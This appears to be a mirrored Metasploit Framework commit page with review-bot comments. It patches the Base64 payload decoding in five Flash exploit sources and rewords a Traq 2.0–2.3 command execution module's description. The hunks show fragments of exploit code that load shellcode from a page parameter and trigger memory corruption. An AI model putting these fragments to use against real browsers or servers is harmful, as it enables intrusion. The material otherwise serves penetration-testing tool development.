mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-09-04 20:18:27 +02:00
Solve conflics
commit
e9714bfc82
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@ -27,7 +27,10 @@ package
|
|||||||
public function Main()
|
public function Main()
|
||||||
{
|
{
|
||||||
var b64:Base64Decoder = new Base64Decoder()
|
var b64:Base64Decoder = new Base64Decoder()
|
||||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
|
var pattern:RegExp = / /g;
|
||||||
|
b64_payload = b64_payload.replace(pattern, "+")
|
||||||
|
b64.decode(b64_payload)
|
||||||
var payload:String = b64.toByteArray().toString()
|
var payload:String = b64.toByteArray().toString()
|
||||||
|
|
||||||
for (i = 0; i < bv.length; i++) {
|
for (i = 0; i < bv.length; i++) {
|
||||||
|
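Review bot: The new `b64_payload.replace(pattern, "+")` line in `Main()` has no comment saying why spaces are turned into plus signs, and the reason cannot be read off these lines. Presumably the `+` characters of the Base64 text in the `sh` loader parameter arrive as spaces after URL-decoding and have to be restored before `b64.decode`; if so, I would say it in a comment above the call, e.g. `// '+' in the Base64 text arrives as ' ' once the sh parameter is URL-decoded; restore it before decoding`. The same four added lines recur in the other four ActionScript hunks on this page, so the comment belongs there as well, and the sequence would read better as one shared helper than as five copies. The added lines also mix terminated and unterminated statements (`var pattern:RegExp = / /g;` against its neighbours); pick one style. `Main()` continues past the end of this hunk.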
@ -32,9 +32,11 @@ package
|
|||||||
var i:uint = 0
|
var i:uint = 0
|
||||||
var j:uint = 0
|
var j:uint = 0
|
||||||
|
|
||||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
payload = b64.toByteArray().toString();
|
var pattern:RegExp = / /g;
|
||||||
|
b64_payload = b64_payload.replace(pattern, "+")
|
||||||
|
b64.decode(b64_payload)
|
||||||
|
payload = b64.toByteArray().toString()
|
||||||
for (i = 0; i < defrag.length; i++) {
|
for (i = 0; i < defrag.length; i++) {
|
||||||
defrag[i] = new ByteArray()
|
defrag[i] = new ByteArray()
|
||||||
defrag[i].length = BYTE_ARRAY_SIZE
|
defrag[i].length = BYTE_ARRAY_SIZE
|
||||||
|
@ -42,8 +42,11 @@ package
|
|||||||
this.object_vector_length = 5770 * 2
|
this.object_vector_length = 5770 * 2
|
||||||
this.byte_array_vector_length = 510 * 2
|
this.byte_array_vector_length = 510 * 2
|
||||||
|
|
||||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
payload = b64.toByteArray().toString();
|
var pattern:RegExp = / /g;
|
||||||
|
b64_payload = b64_payload.replace(pattern, "+")
|
||||||
|
b64.decode(b64_payload)
|
||||||
|
payload = b64.toByteArray().toString()
|
||||||
|
|
||||||
this.initialize_worker_and_ba()
|
this.initialize_worker_and_ba()
|
||||||
if (!this.trigger())
|
if (!this.trigger())
|
||||||
|
@ -39,7 +39,10 @@ public class Main extends Sprite
|
|||||||
|
|
||||||
private function mainThread():void
|
private function mainThread():void
|
||||||
{
|
{
|
||||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
|
var pattern:RegExp = / /g;
|
||||||
|
b64_payload = b64_payload.replace(pattern, "+")
|
||||||
|
b64.decode(b64_payload)
|
||||||
payload = b64.toByteArray().toString()
|
payload = b64.toByteArray().toString()
|
||||||
|
|
||||||
ba.length = 0x1000
|
ba.length = 0x1000
|
||||||
|
@ -43,7 +43,10 @@ package
|
|||||||
|
|
||||||
private function mainThread():void
|
private function mainThread():void
|
||||||
{
|
{
|
||||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
|
var pattern:RegExp = / /g;
|
||||||
|
b64_payload = b64_payload.replace(pattern, "+")
|
||||||
|
b64.decode(b64_payload)
|
||||||
payload = b64.toByteArray().toString()
|
payload = b64.toByteArray().toString()
|
||||||
ba.length = 0x1000
|
ba.length = 0x1000
|
||||||
ba.shareable = true
|
ba.shareable = true
|
||||||
|
@ -17,12 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||||||
This module exploits an arbitrary command execution vulnerability in
|
This module exploits an arbitrary command execution vulnerability in
|
||||||
Traq 2.0 to 2.3. It's in the admincp/common.php script.
|
Traq 2.0 to 2.3. It's in the admincp/common.php script.
|
||||||
|
|
||||||
This function is called in each script located into /admicp/ directory to
|
This function is called in each script located in the /admicp/ directory to
|
||||||
make sure the user has admin rights, but this is a broken authorization
|
make sure the user has admin rights. This is a broken authorization schema
|
||||||
schema due to the header() function doesn't stop the execution flow. This
|
because the header() function doesn't stop the execution flow.
|
||||||
can be exploited by malicious users to execute admin functionality resulting
|
This can be exploited by malicious users to execute admin functionality,
|
||||||
for e.g. in execution of arbitrary PHP code leveraging of plugins.php
|
e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.
|
||||||
functionality.
|
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
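Review bot: The reworded description still spells the directory `/admicp/`, while the sentence above it names `admincp/common.php`, so this looks like a typo for `/admincp/`. "This function is called in each script" has no antecedent, because no function is named before it; presumably the authorization check in common.php is meant, and the text should name it. The last sentence would read more cleanly as `e.g. execution of arbitrary PHP code by leveraging the plugins.php functionality.` The surrounding module definition starts and ends outside this hunk.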